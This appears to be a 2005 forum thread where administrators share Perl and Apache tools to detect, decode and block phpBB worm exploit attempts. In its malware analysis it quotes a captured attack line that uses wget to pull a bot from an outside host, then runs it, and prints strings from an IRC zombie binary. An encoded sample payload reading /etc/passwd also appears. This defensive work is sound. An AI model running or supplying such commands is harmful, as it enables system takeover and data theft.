Void's Forums

Posted: **Sat Jan 01, 2005 5:24 pm**

I just wrote a script that will automatically block IP addresses (via iptables) that are running the phpBB worm or people trying to exploit my site via the same vulnerability. Even though I am patched I don't want them poking around. There are two parts to this. The Perl CGI script and the rewrite rules. Here are the rules for the /etc/httpd/conf/httpd.conf:

Code: Select all: # block IP addresses of PHP/phpBB vulnerability attempts RewriteCond %{REQUEST_URI} ^(.*)\&rush=(.*) [NC] RewriteRule ^.*$ /z/blk_php_worm.cgi RewriteCond %{QUERY_STRING} ^(.*)\&rush=(.*) [NC] RewriteRule ^.*$ /z/blk_php_worm.cgi RewriteCond %{QUERY_STRING} ^(.*)echr\((.*) [NC] RewriteRule ^.*$ /z/blk_php_worm.cgi RewriteCond %{QUERY_STRING} ^(.*)wget%20(.*) [NC] RewriteRule ^.*$ /z/blk_php_worm.cgi RewriteCond %{QUERY_STRING} ^(.*)perl%20(.*) [NC] RewriteRule ^.*$ /z/blk_php_worm.cgi RewriteCond %{QUERY_STRING} ^(.*)system\((.*) [NC] RewriteRule ^.*$ /z/blk_php_worm.cgi

The /z/blk_php_worm.cgi script (modify to fit your environment):

Code: Select all: #!/usr/bin/perl # by Void Main # block sites with PHP worm use Socket; # These files have to exist and writable by apache user $log = "/public/php_worm.log"; $blklog = "/public/php_worm_blocked.log"; $iaddr = inet_aton("$ENV{REMOTE_ADDR}"); $name = gethostbyaddr($iaddr, AF_INET); ($sec,$min,$hour,$mday,$mon,$year,$wday,$yday,$isdst) = localtime(time); $year+=1900; $mon+=1; open(OF,">>$log"); printf(OF "%04d/%02d/%02d %02d:%02d:%02d - $ENV{REMOTE_ADDR} - $name\n", $year, $mon, $mday, $hour, $min, $sec); close(OF); # Only really block if Query String is greater than 50 chars # Put any conditions you like here if ( length($ENV{QUERY_STRING}) > 50 ) { $block = 1; $blkmsg = "If you feel you have been blocked in error please send your IP address to \"voidmain AT linuxmail.org\" and I will unblock you."; } else { $blkmsg = "Actually, you weren\'t blocked this time but you are pushing your luck!"; } print "Content-type: text/html\n\n"; print <<EndEND; <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>Your IP Address has been blocked!</title> </head> <body bgcolor=black text=white> <h3>Your IP Address has been blocked!</h3> The following is a portion of the information that has been logged and sent to the FBI for further analysis: Your Address: $ENV{REMOTE_ADDR} Your Hostname: $name $blkmsg </body> </html> EndEND if ( $block ) { system("/usr/bin/sudo /sbin/block $ENV{REMOTE_ADDR} >> $blklog 2>&1"); } else { open(OF,">>$blklog"); printf(OF "%04d/%02d/%02d %02d:%02d:%02d - $ENV{REMOTE_ADDR} - not infected\n",$year,$mon,$mday,$hour,$min,$sec); close(OF); }

NOTES:
- You have to have my "block" script in your /sbin directory (should be in my files section).
- You have to have sudo configured to allow the apache user to execute the block script.
- The only check above the QUERY_STRING checks in the rewrite rules are to see if the QUERY_STRING is greater than 50 chars (so I can test without blocking myself). You could come up with better tests.
- I have my logs in /public, change this to whereever you want them to go and then make sure they exist and are writable by user "apache".

Posted: **Sun Jan 02, 2005 8:55 am**

wow!! I really wish I could understand that and be able to write atleast something close to them...

Posted: **Sun Jan 02, 2005 9:34 am**

I just added another rewrite rule (&rush=) and made a few minor changes to the script, still ugly but works:
http://voidmain.is-a-geek.net/files/scr ... p_worm.txt

If you want to use it just rename it and set it executable and put it in a CGI capable directory on your server. You'll need to change the two log variables to point to whatever you want for the log file names, touch the log file names and chang ownership of them to your apache user. Whereever you put this script make sure it's path/name is reflected in your rewrite rules in your httpd.conf.

Now there are two other pieces that must be in place before someone will actually get blocked. You have to have to be running iptables and have my block script installed and you have to have sudo configured to allow the apache user to execute the block script. Here are my block and unblock scripts:

http://voidmain.is-a-geek.net/files/iptables/block
http://voidmain.is-a-geek.net/files/iptables/unblock

They might actually be a little Red Hat specific because of the "/sbin/service iptables save" line. This could be replaced with an "iptables-save" command (see "man iptables-save"). Also change the "dev" variable to the network interface that you want the rules applied to.

To configure sudo use the "visudo" command. Here is my config:
http://voidmain.is-a-geek.net/files/configs/sudoers

If you are interested in setting it up and get stuck somewhere I can try and help.

Posted: **Sun Jan 09, 2005 4:17 pm**

I updated the decode script to work a little better and edited my previous message to reflect the new code. It seems to work much better now. Your mileage may vary.

Here is the new php_decode_sploit.php:
http://voidmain.is-a-geek.net/files/scr ... it.php.txt

Here is the old one:
http://voidmain.is-a-geek.net/files/scr ... hp.old.txt

Posted: **Mon Jan 10, 2005 9:16 pm**

Heh heh, so I happen to look over my logs to see what commands people have been attempting to run through my phpBB hole that doesn't exist and I get this line:

echo _START_; cd /tmp;wget users.volja.net/kojpic/botek;wget users.volja.net/kojpic/botek;chmod 777 /tmp/botek;/tmp/botek;rm sess_189f0f0889555397a4de5485dd611111; echo _END_

So I download "users.volja.net/kojpic/botek" to see what it is and notice it's a binary executable which when run attempts to set my machine up as an IRC zombie. Looking through the binary shows it's a variant of this:

http://packetstorm.linuxsecurity.com/di ... d/DOSnet.c

So then I decide to check out the site that got owned where the binary resides:

http://users.volja.net/kojpic/

These are some creative kiddies. All you have to do to get shell access is download and run this IRC zombie windows binary and you'll get emailed your shell account login info within 24 hours (SURE you will). Better hurry! :)

So I download and look through the "check.exe" Windows binary and see some pretty funny stuff. I'm sure it sticks itself in the Run registry key by the looks of it. They even tell you "YOU CANT REMOVE MY BOT ! IDIOT !!!!". :)

Selected output from "strings check.exe":

Code: Select all: Software\Microsoft\Windows\CurrentVersion\Run Software\Microsoft\Windows\CurrentVersion\RunServices main thread mode $chan +o $user opme join $1 mjoin part $1 mpart server $1 $2 jump msg $1 FL0000000000000000000000000000000000000000D flood quit PANIC PANIC PANIC !!! panic action $chan smacks $1 smack udp $1 10000 2048 50 ping $1 10000 $2 50 raw PRIVMSG $1 :$chr(1)$2-$chr(1) ctcp bot started. connected to %s. hD @ %d, %d : USERID : UNIX : %s BRh& @ WVS1 NICK %s USER %s 0 0 :%s PING JOIN %s %s USERHOST %s KICK screw you %s! user %s logged out. NOTICE %s :%s NICK PART QUIT PRIVMSG NOTICE VERSION NOTICE %s : VERSION %s login user %s(%s) logged in. password accepted. $user $chan $rndnick $server $chr( rndnick NICK %s logout user %s logged out. reconnect QUIT :reconnecting disconnect QUIT :later quit QUIT :%s QUIT :later status sdbot 0.5b ready. Up %dd %dh %dm. about sdbot 0.5b by [sd] (sdbot@mail.ru). homepage: http://sdbot.n3.net/ threads -[thread list]- %d. %s aliases -[alias list]- %d. %s = %s netinfo sysinfo remove YOU CANT REMOVE MY BOT ! IDIOT !!!! nick join part PART %s killthread thread(s) killed. c_quit c_rndnick c_rn NICK %s prefix open file opened. couldn't open file. server %s -> %s couldn't resolve host visit addalias privmsg action ACTION %s cycle mode MODE %s repeat c_raw c_mode MODE %s c_nick c_join JOIN %s %s c_part PART %s %s %s %s :%s delay update %s\%s.exe update (%s) downloading update from %s... execute couldn't execute file. clone (%s) clone created on %s:%d, in channel %s. download (%s) downloading %s... redirect (%d->%s:%d) redirect created on port %d to %s:%d. c_privmsg c_pm [%s] <%s> %s sending %d udp packets to: %s. packet size: %d, delay: %d[ms]. ping (%s) sending %d pings to %s. packet size: %d, timeout: %d[ms] icmp.dll not available spy (%s) spy created on %s:%d, in channel %s. $%d- joined channel %s. JOIN MODE ACTION ACTION [%s]: * %s %s [%s]: <%s> %s [%s]: %s sets mode: %s [%s]: %s is now known as %s. [%s]: %s has quit(%s). wth %s? [%s]: %s has left %s. [%s]: %s has joined %s. [%s]: nick %s already in use. [%s]: Users in %s: %s Phna@ Rhua@ PRIVMSG %s :finished sending packets to %s. PRIVMSG %s :error sending packets to %s. Ph0c@ PRIVMSG %s :finished sending pings to %s. PRIVMSG %s :error sending pings to %s. file download (%s - %dkb transferred) downloaded %.1f kb to %s @ %.1f kb/sec. PRIVMSG %s :opened %s. downloaded %.1f kb to %s @ %.1f kb/sec. updating... update failed: error executing file. update (%s - %dkb transferred) PRIVMSG %s :couldn't open %s. bad url, or dns error. dial-up connection type: %s (%s). local IP address: %d.%d.%d.%d. connected from: %s cpu: %dMHz. ram: %dKB total, %dKB free. os: Windows %s (%d.%d, build %d). uptime: %dd %dh %dm %s [%s] 2000 hnq@ WVSPP jdRP invalid URL. url visited. error visiting URL. PRVQ h!t@ %s\r.bat @echo off :start if not exist ""%1"" goto done del /F ""%1"" del ""%1"" goto start :done del /F %temp% .bat del %temp% %%comspec%% /c %s %s jihpv@ bl4ckg0atek #black bots1.kralj.net syscfg32.exe Configuration Loader sdbot v0.5b by [sd]

Posted: **Tue Jan 11, 2005 12:06 am**

What do these monkeys want? Just to prove how badass they are? Since Void has stopeed their activity, they're clearly not all that badass, are they?

That run section of the Windows registry, any idea what that does? I've noticed that most trojans and viruses end up creating keys there, which you have to remove by hand after infection. You'd think that these kids would find some other place to put their crap. It's like they've never been to http://www.sarc.com

Posted: **Tue Jan 11, 2005 6:51 am**

worker201 wrote:That run section of the Windows registry, any idea what that does? I've noticed that most trojans and viruses end up creating keys there, which you have to remove by hand after infection. You'd think that these kids would find some other place to put their crap. It's like they've never been to http://www.sarc.com

They put it in the Run key because anything in the Run key gets started automatically when the system starts up (like putting it in the AUTOEXEC.BAT in the old days). It's one of the reasons Microsoft is such a piece of crap and I won't use it, no security. There is absolutely no way a user should be able to add something to the system registy without requiring some sort of extra authentication (a password, etc). It would be like a normal user in Linux being able to add something to the rc scripts. Of course most of the people that use Windows that I know would probably happily supply a password for such malware. Might be pointless now that I think about it.

Posted: **Fri Jan 14, 2005 1:36 am**

LOL.. I love the sarcasrm!

Anyway Void you enspire me! So I wrote a little filter script to compliment the collection of tools you have written for this little epidemic. After reading how many sites are trying to hit you you may not want to run this simply for the possible system resource hogging. Anyway I wrote a filter to put in place of your viewtopic.php and monitor http requests passing valid and blocking non-valid. It also emails a selected email[s] information of the attempted attack. If you notice that your site seems to be lagged by 1700 attempts simply disable the mail function and save log in some other way.

Code: Select all: #!/usr/bin/perl -wT ################################################### #Program: sploit_filter.cgi #Author: ZiaTioN #Requires: See "use" statements for modules # Message Board running phpBB # # Description: # This filter app can be used to filter # harmfull requests that attempt to use # the highlight exploit in phpBB. If detected # the script will block access and email # system administrator details about the # malicious user. Information such as IP # Address, Web Browser, Attempted shell code, # etc. There is much more info that can be # added if desired. # To effectively install this filter you need # to have all message board http requests # traverse through this filter application. # To accomplish this one possible way is to # create a dummy viewtopic.php file and have it # redirect to the sploit_filter.cgi script # along with sending the entire query string (URL). # Then rename your real viewtopic.php file something # else and have the filter script redirect valid # traffic to this newly renamed viewtopic.php. # # Ex: # Exploit Code Results: --><error page>--><web browser> # <web query>--><dummy viewtopic.php>--><sploit_filter.cgi> # Valid Traffic Results: --><renamed viewtopic.php>--><web browser> ################################################## use strict; use CGI qw(:standard); use Mail::Sendmail; my $query = $ENV{QUERY_STRING}; my $link = $ENV{REQUEST_URI}; if (($query =~ /highlight/) && ($query =~ /system/) || ($query =~ /rush/)) { my $string = $1 if (($query =~ /system(.*)/) || ($query =~ /rush(.*)/)); my ($decode, @chars, $dString); if ($string && $string =~ /chr$\d+?$/) { $decode = url_decode($string); @chars = split(" ", $decode); $dString .= chr($_) for (@chars); }else{ $dString = url_hex_decode($string); } print "Content-type: text/html; charset=ISO-8859-1\n\n"; print <<END; <html> <head><title>Exploit Attempt!</title> <style type="text/css">  </style> </head> <body bgcolor="#000000" text="#808080" topmargin="0" leftmargin="0" bottommargin="0" rightmargin="0" marginwidth="0" marginheight="0"> <center> You Have Tried To Exploit This Server! Your Information Has Been Logged And Sent To The System Administrator! Decoded Command[s]: $dString </center> </body> </html> END send_alert($dString); }else{ my $valid = "http:www.perlskripts.com".$link; # <-- change the quoted portion of this variable to your site. print redirect($valid); } sub url_decode { my $theURL = shift; $theURL =~ s/%([a-fA-F0-9]+)//eg; $theURL =~ s/$//g; $theURL =~ s/$//g; $theURL =~ s/[^\d+]/ /g; return $theURL; } sub url_hex_decode { my $theURL = shift; $theURL =~ s/$//g; $theURL =~ s/$//g; $theURL =~ s/\%([A-Fa-f0-9]{2})/pack('C', hex($1))/seg; $theURL =~ s/[%\d]+//g; return $theURL; } sub send_alert { my $command = shift; my %mail = ( To => 'user@email.com, email@user.com', # <-- change this to how ever many valid emails you want to receive alerts. From => 'root@localhost.com', Subject => "An Exploit Attempt Has Been Made!!", Message => "Malicious User Info\nAttackers Address: $ENV{REMOTE_ADDR}\nAttackers Browser: $ENV{HTTP_USER_AGENT}\nCommand[s] Sent: $command" ); sendmail (%mail) || die $Mail::Sendmail::error; }

I do not have a message board period, let alone one running phpBB so I have not tested this against a phpBB board directly but I have tested in other ways and it seems to be very functional. I noticed that attackers have been sending attempts in all raw hex or a meddly of hex and unicode so I added decode functions for both.

Posted: **Fri Jan 14, 2005 1:51 am**

Just for shits and giggles here is another small one I wrote to encode and decode hex to ascii and vise versa.

Code: Select all: #!/usr/bin/perl -w use strict; die "Error!\n" unless @ARGV; my $opt = $ARGV[0]; my $cmd = $ARGV[1]; if ($opt eq "-encode") { $cmd =~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg; }elsif ($opt eq "-decode") { $cmd =~ s/\%([A-Fa-f0-9]{2})/pack('C', hex($1))/seg; }else{ usage(); exit(0); } print "Your encoded string is: $cmd\n"; sub usage{ my @path = split(/\//, $0); @path = reverse(@path); print "Syntax error!\nUsage: $path[0] <-encode|-decode> <command[s] to parse>\n"; }

Run like:

[ziation@perlskripts.com]$ perl encdec.pl -encode "w;uname -a;ls -al;kill yomamma;cat /etc/passwd"
Your encoded string is: %77%3B%75%6E%61%6D%65%20%2D%61%3B%6C%73%20%2D%61%6C\
%3B%6B%69%6C%6C%20%79%6F%6D%61%6D%6D%61%3B%63%61%74\
%20%2F%65%74%63%2F%70%61%73%73%77%64
[ziation@perlskripts.com]$ perl encdec.pl -decode %77%3B%75%6E%61%6D%65%20%2D%61%3B%6C%73%20%2D%61%6C\
%3B%6B%69%6C%6C%20%79%6F%6D%61%6D%6D%61%3B%63%61%74\
%20%2F%65%74%63%2F%70%61%73%73%77%64
Your decoded string is: w;uname -a;ls -al;kill yomamma;cat /etc/passwd

Posted: **Fri Jan 14, 2005 2:08 am**

That's pretty good. It should work and it did give me an idea. Couple of thoughts on the subject, having the script send me a message for every exploit attempt would surely flood my mailbox, especially in the early days of this last phpBB worm. You probably would want it to go to a log instead as you mention (which I do when I lock out sites who hit me with exploit attempts). Of course when I first noticed the problem I only had a few manual attempts but when the worm hit it was thousands of exploited machines that were hitting me which I don't really need to know about but I do want to filter that traffic (again the firewall block script works well for this).

Now the idea part. Instead of sending a message to "me" on an exploit attempt it would be great if, in addition to the firewall block of the address that the exploit attempt originated from, a message could be sent to the webmaster of the exploited server. Problem is, most people don't put their email addresses anywhere on their web sites any more. It used to be you could go to a random page that doesn't exist and grab the email address off of it like on my site:

http://voidmain.is-a-geek.net/page_that ... exist.html

In this last worm someone actually was a little more creative and wrote a variant of the worm that went around and patched all the vulnerable systems. :) It's something I never would have done because that will land you in jail just as fast as the author of the original worm author.

A note on the redirect. I used the Apache redirect rules to redirect an exploit attempt to my block page. This should be quite a bit more efficient than calling a CGI program. Good job! I was hoping someone would come up with some other ideas. :)

Posted: **Fri Jan 14, 2005 2:19 am**

ZiaTioN wrote:Run like:

[ziation@perlskripts.com]$ perl encdec.pl -encode "w;uname -a;ls -al;kill yomamma;cat /etc/passwd"
Your encoded string is: %77%3B%75%6E%61%6D%65%20%2D%61%3B%6C%73%20%2D%61%6C\
%3B%6B%69%6C%6C%20%79%6F%6D%61%6D%6D%61%3B%63%61%74\
%20%2F%65%74%63%2F%70%61%73%73%77%64
[ziation@perlskripts.com]$ perl encdec.pl -decode %77%3B%75%6E%61%6D%65%20%2D%61%3B%6C%73%20%2D%61%6C\
%3B%6B%69%6C%6C%20%79%6F%6D%61%6D%6D%61%3B%63%61%74\
%20%2F%65%74%63%2F%70%61%73%73%77%64
Your decoded string is: w;uname -a;ls -al;kill yomamma;cat /etc/passwd

I edited your message and broke the strings up as the lines were too long for the forum width. Sorry about that. Just curious, how will your script handle these log entries:

http://voidmain.is-a-geek.net/files/scr ... .input.log

I get this with my decoder:

http://voidmain.is-a-geek.net/files/scr ... output.log

Posted: **Fri Jan 14, 2005 10:59 am**

I think I get the same thing.

Here is what I get off of the first string.
Here is what I get from the second entry in your example.

This style of attack code was the first syntax I coded this filter for but I added the pure hex decode also after I saw thisexploit script. Namely the way they construct their $cmd variable and $path variables. They use pure hex so I added the functionality to filter and block those attempts also.

Thisis the first example with the pure hex exploit attempt.
Thisis the second example with the pure hex exploit attempt instead of the mix of hex and unicode.

If you notice on these last two links if you hover your mouse over each link your broweser will decode the pure hex itself and show you the true link at the bottom (or at least Firefox does). I guess you would have to "view source" to actually see the hex strings I used.

Posted: **Fri Jan 14, 2005 12:29 pm**

Hey, I was just checking out your site. Very slick/clean look. I wish I had an ounce of that creativity! :)

Posted: **Fri Jan 14, 2005 12:49 pm**

Ahh cool, thanks. I don't know if you would call it creativity but I appreciate the compliment :-)

.

By the way, I have implemented a way to extract the domain from the encoded exploit string and obtain an email (if it exists) to email the admin of the infected site but am having issues with using the secure open() call neccessary when using taint mode. I am still working on it here and there and hopefully will be up by this afternoon.

Posted: **Fri Jan 14, 2005 1:32 pm**

Are you talking about the address of the server that generated the hit or the address in the encoded string where the code is downloaded from? I was referring to the former. Both addresses are likely 0wned though.

Void's Forums

phpBB - update it now!